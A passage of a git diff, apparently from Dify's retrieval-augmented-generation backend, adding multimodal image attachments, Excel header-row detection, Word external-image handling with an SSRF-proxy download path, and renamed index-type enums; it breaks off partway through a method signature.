a/api/core/rag/embedding/embedding_base.py b/api/core/rag/embedding/embedding_base.py index 9f232ab910..1be55bda80 100644 --- a/api/core/rag/embedding/embedding_base.py +++ b/api/core/rag/embedding/embedding_base.py @@ -9,11 +9,21 @@ class Embeddings(ABC): """Embed search docs.""" raise NotImplementedError + @abstractmethod + def embed_multimodal_documents(self, multimodel_documents: list[dict]) -> list[list[float]]: + """Embed file documents.""" + raise NotImplementedError + @abstractmethod def embed_query(self, text: str) -> list[float]: """Embed query text.""" raise NotImplementedError + @abstractmethod + def embed_multimodal_query(self, multimodel_document: dict) -> list[float]: + """Embed multimodal query.""" + raise NotImplementedError + async def aembed_documents(self, texts: list[str]) -> list[list[float]]: """Asynchronous Embed search docs.""" raise NotImplementedError diff --git a/api/core/rag/embedding/retrieval.py b/api/core/rag/embedding/retrieval.py index 8e92191568..b54a37b49e 100644 --- a/api/core/rag/embedding/retrieval.py +++ b/api/core/rag/embedding/retrieval.py @@ -19,3 +19,4 @@ class RetrievalSegments(BaseModel): segment: DocumentSegment child_chunks: list[RetrievalChildChunk] | None = None score: float | None = None + files: list[dict[str, str | int]] | None = None diff --git a/api/core/rag/entities/citation_metadata.py b/api/core/rag/entities/citation_metadata.py index aca879df7d..9f66cd9a03 100644 --- a/api/core/rag/entities/citation_metadata.py +++ b/api/core/rag/entities/citation_metadata.py @@ -21,3 +21,4 @@ class RetrievalSourceMetadata(BaseModel): page: int | None = None doc_metadata: dict[str, Any] | None = None title: str | None = None + files: list[dict[str, Any]] | None = None diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/excel_extractor.py b/api/core/rag/extractor/excel_extractor.py index ea9c6bd73a..875bfd1439 100644 --- a/api/core/rag/extractor/excel_extractor.py +++ b/api/core/rag/extractor/excel_extractor.py @@ -1,7 +1,7 @@ """Abstract interface for document loader implementations.""" import os -from typing import cast +from typing import TypedDict import pandas as pd from openpyxl import load_workbook @@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor from core.rag.models.document import Document +class Candidate(TypedDict): + idx: int + count: int + map: dict[int, str] + + class ExcelExtractor(BaseExtractor): """Load Excel files. @@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor): file_extension = os.path.splitext(self._file_path)[-1].lower() if file_extension == ".xlsx": - wb = load_workbook(self._file_path, data_only=True) - for sheet_name in wb.sheetnames: - sheet = wb[sheet_name] - data = sheet.values - cols = next(data, None) - if cols is None: - continue - df = pd.DataFrame(data, columns=cols) - - df.dropna(how="all", inplace=True) - - for index, row in df.iterrows(): - page_content = [] - for col_index, (k, v) in enumerate(row.items()): - if pd.notna(v): - cell = sheet.cell( - row=cast(int, index) + 2, column=col_index + 1 - ) # +2 to account for header and 1-based index - if cell.hyperlink: - value = f"[{v}]({cell.hyperlink.target})" - page_content.append(f'"{k}":"{value}"') - else: - page_content.append(f'"{k}":"{v}"') - documents.append( - Document(page_content=";".join(page_content), metadata={"source": self._file_path}) - ) + wb = load_workbook(self._file_path, read_only=True, data_only=True) + try: + for sheet_name in wb.sheetnames: + sheet = wb[sheet_name] + header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet) + if not column_map: + continue + start_row = header_row_idx + 1 + for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False): + if all(cell.value is None for cell in row): + continue + page_content = [] + for col_idx, cell in enumerate(row): + value = cell.value + if col_idx in column_map: + col_name = column_map[col_idx] + if hasattr(cell, "hyperlink") and cell.hyperlink: + target = getattr(cell.hyperlink, "target", None) + if target: + value = f"[{value}]({target})" + if value is None: + value = "" + elif not isinstance(value, str): + value = str(value) + value = value.strip().replace('"', '\\"') + page_content.append(f'"{col_name}":"{value}"') + if page_content: + documents.append( + Document(page_content=";".join(page_content), metadata={"source": self._file_path}) + ) + finally: + wb.close() elif file_extension == ".xls": excel_file = pd.ExcelFile(self._file_path, engine="xlrd") @@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor): df = excel_file.parse(sheet_name=excel_sheet_name) df.dropna(how="all", inplace=True) - for _, row in df.iterrows(): + for _, series_row in df.iterrows(): page_content = [] - for k, v in row.items(): + for k, v in series_row.items(): if pd.notna(v): page_content.append(f'"{k}":"{v}"') documents.append( @@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor): raise ValueError(f"Unsupported file extension: {file_extension}") return documents + + def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]: + """ + Scan first N rows to find the most likely header row. + Returns: + header_row_idx: 1-based index of the header row + column_map: Dict mapping 0-based column index to column name + max_col_idx: 1-based index of the last valid column (for iter_rows boundary) + """ + # Store potential candidates: (row_index, non_empty_count, column_map) + candidates: list[Candidate] = [] + + # Limit scan to avoid performance issues on huge files + # We iterate manually to control the read scope + for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1): + # Filter out empty cells and build a temp map for this row + # col_idx is 0-based + row_map = {} + for col_idx, cell_value in enumerate(row): + if cell_value is not None and str(cell_value).strip(): + row_map[col_idx] = str(cell_value).strip().replace('"', '\\"') + + if not row_map: + continue + + non_empty_count = len(row_map) + + # Header selection heuristic (implemented): + # - Prefer the first row with at least 2 non-empty columns. + # - Fallback: choose the row with the most non-empty columns + # (tie-breaker: smaller row index). + candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map}) + + if not candidates: + return 0, {}, 0 + + # Choose the best candidate header row. + + best_candidate: Candidate | None = None + + # Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback. + + for cand in candidates: + if cand["count"] >= 2: + best_candidate = cand + break + + # Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns + if not best_candidate: + # Sort by count desc, then index asc + candidates.sort(key=lambda x: (-x["count"], x["idx"])) + best_candidate = candidates[0] + + # Determine max_col_idx (1-based for openpyxl) + # It is the index of the last valid column in our map + 1 + max_col_idx = max(best_candidate["map"].keys()) + 1 + + return best_candidate["idx"], best_candidate["map"], max_col_idx diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/helpers.py b/api/core/rag/extractor/helpers.py index 5166c0c768..5b466b281c 100644 --- a/api/core/rag/extractor/helpers.py +++ b/api/core/rag/extractor/helpers.py @@ -45,6 +45,6 @@ def detect_file_encodings(file_path: str, timeout: int = 5, sample_size: int = 1 except concurrent.futures.TimeoutError: raise TimeoutError(f"Timeout reached while detecting encoding for {file_path}") - if all(encoding["encoding"] is None for encoding in encodings): + if all(encoding.encoding is None for encoding in encodings): raise RuntimeError(f"Could not detect encoding for {file_path}") - return [FileEncoding(**enc) for enc in encodings if enc["encoding"] is not None] + return [enc for enc in encodings if enc.encoding is not None] diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index c7a5568866..f67f613e9d 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -83,23 +83,46 @@ class WordExtractor(BaseExtractor): def _extract_images_from_docx(self, doc): image_count = 0 image_map = {} + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL - for rel in doc.part.rels.values(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: url = rel.target_ref - response = ssrf_proxy.get(url) + if not self._is_valid_url(url): + continue + try: + response = ssrf_proxy.get(url) + except Exception as e: + logger.warning("Failed to download image from URL: %s: %s", url, str(e)) + continue if response.status_code == 200: - image_ext = mimetypes.guess_extension(response.headers["Content-Type"]) + image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", "")) if image_ext is None: continue file_uuid = str(uuid.uuid4()) - file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." + image_ext + file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, response.content) - else: - continue + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + image_map[r_id] = f"![image]({base_url}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -110,27 +133,25 @@ class WordExtractor(BaseExtractor): mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, rel.target_part.blob) - # save file to db - upload_file = UploadFile( - tenant_id=self.tenant_id, - storage_type=dify_config.STORAGE_TYPE, - key=file_key, - name=file_key, - size=0, - extension=str(image_ext), - mime_type=mime_type or "", - created_by=self.user_id, - created_by_role=CreatorUserRole.ACCOUNT, - created_at=naive_utc_now(), - used=True, - used_by=self.user_id, - used_at=naive_utc_now(), - ) - - db.session.add(upload_file) - db.session.commit() - image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" - + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + image_map[rel.target_part] = f"![image]({base_url}/files/{upload_file.id}/file-preview)" + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): @@ -186,11 +207,17 @@ class WordExtractor(BaseExtractor): image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed") if not image_id: continue - image_part = paragraph.part.rels[image_id].target_part - - if image_part in image_map: - image_link = image_map[image_part] - paragraph_content.append(image_link) + rel = paragraph.part.rels.get(image_id) + if rel is None: + continue + # For external images, use image_id as key; for internal, use target_part + if rel.is_external: + if image_id in image_map: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map: + paragraph_content.append(image_map[image_part]) else: paragraph_content.append(run.text) return "".join(paragraph_content).strip() @@ -227,6 +254,18 @@ class WordExtractor(BaseExtractor): def parse_paragraph(paragraph): paragraph_content = [] + + def append_image_link(image_id, has_drawing): + """Helper to append image link from image_map based on relationship type.""" + rel = doc.part.rels[image_id] + if rel.is_external: + if image_id in image_map and not has_drawing: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map and not has_drawing: + paragraph_content.append(image_map[image_part]) + for run in paragraph.runs: if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"): # Process drawing type images @@ -243,10 +282,18 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed" ) if embed_id: - image_part = doc.part.related_parts.get(embed_id) - if image_part in image_map: - has_drawing = True - paragraph_content.append(image_map[image_part]) + rel = doc.part.rels.get(embed_id) + if rel is not None and rel.is_external: + # External image: use embed_id as key + if embed_id in image_map: + has_drawing = True + paragraph_content.append(image_map[embed_id]) + else: + # Internal image: use target_part as key + image_part = doc.part.related_parts.get(embed_id) + if image_part in image_map: + has_drawing = True + paragraph_content.append(image_map[image_part]) # Process pict type images shape_elements = run.element.findall( ".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict" @@ -261,9 +308,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) # Find imagedata element in VML image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata") if image_data is not None: @@ -271,9 +316,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) if run.text.strip(): paragraph_content.append(run.text.strip()) return "".join(paragraph_content) if paragraph_content else "" diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" diff --git a/api/core/rag/index_processor/constant/doc_type.py b/api/core/rag/index_processor/constant/doc_type.py new file mode 100644 index 0000000000..93c8fecb8d --- /dev/null +++ b/api/core/rag/index_processor/constant/doc_type.py @@ -0,0 +1,6 @@ +from enum import StrEnum + + +class DocType(StrEnum): + TEXT = "text" + IMAGE = "image" diff --git a/api/core/rag/index_processor/constant/index_type.py b/api/core/rag/index_processor/constant/index_type.py index 659086e808..09617413f7 100644 --- a/api/core/rag/index_processor/constant/index_type.py +++ b/api/core/rag/index_processor/constant/index_type.py @@ -1,7 +1,12 @@ from enum import StrEnum -class IndexType(StrEnum): +class IndexStructureType(StrEnum): PARAGRAPH_INDEX = "text_model" QA_INDEX = "qa_model" PARENT_CHILD_INDEX = "hierarchical_model" + + +class IndexTechniqueType(StrEnum): + ECONOMY = "economy" + HIGH_QUALITY = "high_quality" diff --git a/api/core/rag/index_processor/constant/query_type.py b/api/core/rag/index_processor/constant/query_type.py new file mode 100644 index 0000000000..342bfef3f7 --- /dev/null +++ b/api/core/rag/index_processor/constant/query_type.py @@ -0,0 +1,6 @@ +from enum import StrEnum + + +class QueryType(StrEnum): + TEXT_QUERY = "text_query" + IMAGE_QUERY = "image_query" diff --git a/api/core/rag/index_processor/index_processor_base.py b/api/core/rag/index_processor/index_processor_base.py index d4eff53204..8a28eb477a 100644 --- a/api/core/rag/index_processor/index_processor_base.py +++ b/api/core/rag/index_processor/index_processor_base.py @@ -1,20 +1,34 @@ """Abstract interface for document loader implementations.""" +import cgi +import logging +import mimetypes +import os +import re from abc import ABC, abstractmethod from collections.abc import Mapping from typing import TYPE_CHECKING, Any, Optional +from urllib.parse import unquote, urlparse + +import httpx from configs import dify_config +from core.helper import ssrf_proxy from core.rag.extractor.entity.extract_setting import ExtractSetting -from core.rag.models.document import Document +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.models.document import AttachmentDocument, Document from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.rag.splitter.fixed_text_splitter import ( EnhanceRecursiveCharacterTextSplitter, FixedRecursiveCharacterTextSplitter, ) from core.rag.splitter.text_splitter import TextSplitter +from extensions.ext_database import db +from extensions.ext_storage import storage +from models import Account, ToolFile from models.dataset import Dataset, DatasetProcessRule from models.dataset import Document as DatasetDocument +from models.model import UploadFile if TYPE_CHECKING: from core.model_manager import ModelInstance @@ -28,11 +42,18 @@ class BaseIndexProcessor(ABC): raise NotImplementedError @abstractmethod - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: raise NotImplementedError @abstractmethod - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): raise NotImplementedError @abstractmethod @@ -96,3 +117,178 @@ class BaseIndexProcessor(ABC): ) return character_splitter # type: ignore + + def _get_content_files(self, document: Document, current_user: Account | None = None) -> list[AttachmentDocument]: + """ + Get the content files from the document. + """ + multi_model_documents: list[AttachmentDocument] = [] + text = document.page_content + images = self._extract_markdown_images(text) + if not images: + return multi_model_documents + upload_file_id_list = [] + + for image in images: + # Collect all upload_file_ids including duplicates to preserve occurrence count + + # For data before v0.10.0 + pattern = r"/files/([a-f0-9\-]+)/image-preview(?:\?.*?)?" + match = re.search(pattern, image) + if match: + upload_file_id = match.group(1) + upload_file_id_list.append(upload_file_id) + continue + + # For data after v0.10.0 + pattern = r"/files/([a-f0-9\-]+)/file-preview(?:\?.*?)?" + match = re.search(pattern, image) + if match: + upload_file_id = match.group(1) + upload_file_id_list.append(upload_file_id) + continue + + # For tools directory - direct file formats (e.g., .png, .jpg, etc.) + # Match URL including any query parameters up to common URL boundaries (space, parenthesis, quotes) + pattern = r"/files/tools/([a-f0-9\-]+)\.([a-zA-Z0-9]+)(?:\?[^\s\)\"\']*)?" + match = re.search(pattern, image) + if match: + if current_user: + tool_file_id = match.group(1) + upload_file_id = self._download_tool_file(tool_file_id, current_user) + if upload_file_id: + upload_file_id_list.append(upload_file_id) + continue + if current_user: + upload_file_id = self._download_image(image.split(" ")[0], current_user) + if upload_file_id: + upload_file_id_list.append(upload_file_id) + + if not upload_file_id_list: + return multi_model_documents + + # Get unique IDs for database query + unique_upload_file_ids = list(set(upload_file_id_list)) + upload_files = db.session.query(UploadFile).where(UploadFile.id.in_(unique_upload_file_ids)).all() + + # Create a mapping from ID to UploadFile for quick lookup + upload_file_map = {upload_file.id: upload_file for upload_file in upload_files} + + # Create a Document for each occurrence (including duplicates) + for upload_file_id in upload_file_id_list: + upload_file = upload_file_map.get(upload_file_id) + if upload_file: + multi_model_documents.append( + AttachmentDocument( + page_content=upload_file.name, + metadata={ + "doc_id": upload_file.id, + "doc_hash": "", + "document_id": document.metadata.get("document_id"), + "dataset_id": document.metadata.get("dataset_id"), + "doc_type": DocType.IMAGE, + }, + ) + ) + return multi_model_documents + + def _extract_markdown_images(self, text: str) -> list[str]: + """ + Extract the markdown images from the text. + """ + pattern = r"!\[.*?\]\((.*?)\)" + return re.findall(pattern, text) + + def _download_image(self, image_url: str, current_user: Account) -> str | None: + """ + Download the image from the URL. + Image size must not exceed 2MB. + """ + from services.file_service import FileService + + MAX_IMAGE_SIZE = dify_config.ATTACHMENT_IMAGE_FILE_SIZE_LIMIT * 1024 * 1024 + DOWNLOAD_TIMEOUT = dify_config.ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT + + try: + # Download with timeout + response = ssrf_proxy.get(image_url, timeout=DOWNLOAD_TIMEOUT) + response.raise_for_status() + + # Check Content-Length header if available + content_length = response.headers.get("Content-Length") + if content_length and int(content_length) > MAX_IMAGE_SIZE: + logging.warning("Image from %s exceeds 2MB limit (size: %s bytes)", image_url, content_length) + return None + + filename = None + + content_disposition = response.headers.get("content-disposition") + if content_disposition: + _, params = cgi.parse_header(content_disposition) + if "filename" in params: + filename = params["filename"] + filename = unquote(filename) + + if not filename: + parsed_url = urlparse(image_url) + # unquote 处理 URL 中的中文 + path = unquote(parsed_url.path) + filename = os.path.basename(path) + + if not filename: + filename = "downloaded_image_file" + + name, current_ext = os.path.splitext(filename) + + content_type = response.headers.get("content-type", "").split(";")[0].strip() + + real_ext = mimetypes.guess_extension(content_type) + + if not current_ext and real_ext or current_ext in [".php", ".jsp", ".asp", ".html"] and real_ext: + filename = f"{name}{real_ext}" + # Download content with size limit + blob = b"" + for chunk in response.iter_bytes(chunk_size=8192): + blob += chunk + if len(blob) > MAX_IMAGE_SIZE: + logging.warning("Image from %s exceeds 2MB limit during download", image_url) + return None + + if not blob: + logging.warning("Image from %s is empty", image_url) + return None + + upload_file = FileService(db.engine).upload_file( + filename=filename, + content=blob, + mimetype=content_type, + user=current_user, + ) + return upload_file.id + except httpx.TimeoutException: + logging.warning("Timeout downloading image from %s after %s seconds", image_url, DOWNLOAD_TIMEOUT) + return None + except httpx.RequestError as e: + logging.warning("Error downloading image from %s: %s", image_url, str(e)) + return None + except Exception: + logging.exception("Unexpected error downloading image from %s", image_url) + return None + + def _download_tool_file(self, tool_file_id: str, current_user: Account) -> str | None: + """ + Download the tool file from the ID. + """ + from services.file_service import FileService + + tool_file = db.session.query(ToolFile).where(ToolFile.id == tool_file_id).first() + if not tool_file: + return None + blob = storage.load_once(tool_file.file_key) + upload_file = FileService(db.engine).upload_file( + filename=tool_file.name, + content=blob, + mimetype=tool_file.mimetype, + user=current_user, + ) + return upload_file.id diff --git a/api/core/rag/index_processor/index_processor_factory.py b/api/core/rag/index_processor/index_processor_factory.py index c987edf342..ea6ab24699 100644 --- a/api/core/rag/index_processor/index_processor_factory.py +++ b/api/core/rag/index_processor/index_processor_factory.py @@ -1,6 +1,6 @@ """Abstract interface for document loader implementations.""" -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.processor.paragraph_index_processor import ParagraphIndexProcessor from core.rag.index_processor.processor.parent_child_index_processor import ParentChildIndexProcessor @@ -19,11 +19,11 @@ class IndexProcessorFactory: if not self._index_type: raise ValueError("Index type must be specified.") - if self._index_type == IndexType.PARAGRAPH_INDEX: + if self._index_type == IndexStructureType.PARAGRAPH_INDEX: return ParagraphIndexProcessor() - elif self._index_type == IndexType.QA_INDEX: + elif self._index_type == IndexStructureType.QA_INDEX: return QAIndexProcessor() - elif self._index_type == IndexType.PARENT_CHILD_INDEX: + elif self._index_type == IndexStructureType.PARENT_CHILD_INDEX: return ParentChildIndexProcessor() else: raise ValueError(f"Index type {self._index_type} is not supported.") diff --git a/api/core/rag/index_processor/processor/paragraph_index_processor.py b/api/core/rag/index_processor/processor/paragraph_index_processor.py index 5e5fea7ea9..cf68cff7dc 100644 --- a/api/core/rag/index_processor/processor/paragraph_index_processor.py +++ b/api/core/rag/index_processor/processor/paragraph_index_processor.py @@ -11,14 +11,17 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import Document +from core.rag.models.document import AttachmentDocument, Document, MultimodalGeneralStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.tools.utils.text_processing_utils import remove_leading_symbols from libs import helper +from models.account import Account from models.dataset import Dataset, DatasetProcessRule from models.dataset import Document as DatasetDocument +from services.account_service import AccountService from services.entities.knowledge_entities.knowledge_entities import Rule @@ -33,7 +36,7 @@ class ParagraphIndexProcessor(BaseIndexProcessor): return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: process_rule = kwargs.get("process_rule") if not process_rule: raise ValueError("No process rule found.") @@ -69,6 +72,11 @@ class ParagraphIndexProcessor(BaseIndexProcessor): if document_node.metadata is not None: document_node.metadata["doc_id"] = doc_id document_node.metadata["doc_hash"] = hash + multimodal_documents = ( + self._get_content_files(document_node, current_user) if document_node.metadata else None + ) + if multimodal_documents: + document_node.attachments = multimodal_documents # delete Splitter character page_content = remove_leading_symbols(document_node.page_content).strip() if len(page_content) > 0: @@ -77,10 +85,19 @@ class ParagraphIndexProcessor(BaseIndexProcessor): all_documents.extend(split_documents) return all_documents - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): if dataset.indexing_technique == "high_quality": vector = Vector(dataset) vector.create(documents) + if multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(multimodal_documents) with_keywords = False if with_keywords: keywords_list = kwargs.get("keywords_list") @@ -134,8 +151,9 @@ class ParagraphIndexProcessor(BaseIndexProcessor): return docs def index(self, dataset: Dataset, document: DatasetDocument, chunks: Any): + documents: list[Any] = [] + all_multimodal_documents: list[Any] = [] if isinstance(chunks, list): - documents = [] for content in chunks: metadata = { "dataset_id": dataset.id, @@ -144,26 +162,68 @@ class ParagraphIndexProcessor(BaseIndexProcessor): "doc_hash": helper.generate_text_hash(content), } doc = Document(page_content=content, metadata=metadata) + attachments = self._get_content_files(doc) + if attachments: + doc.attachments = attachments + all_multimodal_documents.extend(attachments) documents.append(doc) - if documents: - # save node to document segment - doc_store = DatasetDocumentStore(dataset=dataset, user_id=document.created_by, document_id=document.id) - # add document segments - doc_store.add_documents(docs=documents, save_child=False) - if dataset.indexing_technique == "high_quality": - vector = Vector(dataset) - vector.create(documents) - elif dataset.indexing_technique == "economy": - keyword = Keyword(dataset) - keyword.add_texts(documents) else: - raise ValueError("Chunks is not a list") + multimodal_general_structure = MultimodalGeneralStructureChunk.model_validate(chunks) + for general_chunk in multimodal_general_structure.general_chunks: + metadata = { + "dataset_id": dataset.id, + "document_id": document.id, + "doc_id": str(uuid.uuid4()), + "doc_hash": helper.generate_text_hash(general_chunk.content), + } + doc = Document(page_content=general_chunk.content, metadata=metadata) + if general_chunk.files: + attachments = [] + for file in general_chunk.files: + file_metadata = { + "doc_id": file.id, + "doc_hash": "", + "document_id": document.id, + "dataset_id": dataset.id, + "doc_type": DocType.IMAGE, + } + file_document = AttachmentDocument( + page_content=file.filename or "image_file", metadata=file_metadata + ) + attachments.append(file_document) + all_multimodal_documents.append(file_document) + doc.attachments = attachments + else: + account = AccountService.load_user(document.created_by) + if not account: + raise ValueError("Invalid account") + doc.attachments = self._get_content_files(doc, current_user=account) + if doc.attachments: + all_multimodal_documents.extend(doc.attachments) + documents.append(doc) + if documents: + # save node to document segment + doc_store = DatasetDocumentStore(dataset=dataset, user_id=document.created_by, document_id=document.id) + # add document segments + doc_store.add_documents(docs=documents, save_child=False) + if dataset.indexing_technique == "high_quality": + vector = Vector(dataset) + vector.create(documents) + if all_multimodal_documents and dataset.is_multimodal: + vector.create_multimodal(all_multimodal_documents) + elif dataset.indexing_technique == "economy": + keyword = Keyword(dataset) + keyword.add_texts(documents) def format_preview(self, chunks: Any) -> Mapping[str, Any]: if isinstance(chunks, list): preview = [] for content in chunks: preview.append({"content": content}) - return {"chunk_structure": IndexType.PARAGRAPH_INDEX, "preview": preview, "total_segments": len(chunks)} + return { + "chunk_structure": IndexStructureType.PARAGRAPH_INDEX, + "preview": preview, + "total_segments": len(chunks), + } else: raise ValueError("Chunks is not a list") diff --git a/api/core/rag/index_processor/processor/parent_child_index_processor.py b/api/core/rag/index_processor/processor/parent_child_index_processor.py index 4fa78e2f95..0366f3259f 100644 --- a/api/core/rag/index_processor/processor/parent_child_index_processor.py +++ b/api/core/rag/index_processor/processor/parent_child_index_processor.py @@ -13,14 +13,17 @@ from core.rag.datasource.vdb.vector_factory import Vector from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.extract_setting import ExtractSetting from core.rag.extractor.extract_processor import ExtractProcessor -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor -from core.rag.models.document import ChildDocument, Document, ParentChildStructureChunk +from core.rag.models.document import AttachmentDocument, ChildDocument, Document, ParentChildStructureChunk from core.rag.retrieval.retrieval_methods import RetrievalMethod from extensions.ext_database import db from libs import helper +from models import Account from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment from models.dataset import Document as DatasetDocument +from services.account_service import AccountService from services.entities.knowledge_entities.knowledge_entities import ParentMode, Rule @@ -35,7 +38,7 @@ class ParentChildIndexProcessor(BaseIndexProcessor): return text_docs - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: process_rule = kwargs.get("process_rule") if not process_rule: raise ValueError("No process rule found.") @@ -77,6 +80,9 @@ class ParentChildIndexProcessor(BaseIndexProcessor): page_content = page_content if len(page_content) > 0: document_node.page_content = page_content + multimodel_documents = self._get_content_files(document_node, current_user) + if multimodel_documents: + document_node.attachments = multimodel_documents # parse document to child nodes child_nodes = self._split_child_nodes( document_node, rules, process_rule.get("mode"), kwargs.get("embedding_model_instance") @@ -87,6 +93,9 @@ class ParentChildIndexProcessor(BaseIndexProcessor): elif rules.parent_mode == ParentMode.FULL_DOC: page_content = "\n".join([document.page_content for document in documents]) document = Document(page_content=page_content, metadata=documents[0].metadata) + multimodel_documents = self._get_content_files(document) + if multimodel_documents: + document.attachments = multimodel_documents # parse document to child nodes child_nodes = self._split_child_nodes( document, rules, process_rule.get("mode"), kwargs.get("embedding_model_instance") @@ -104,7 +113,14 @@ class ParentChildIndexProcessor(BaseIndexProcessor): return all_documents - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: 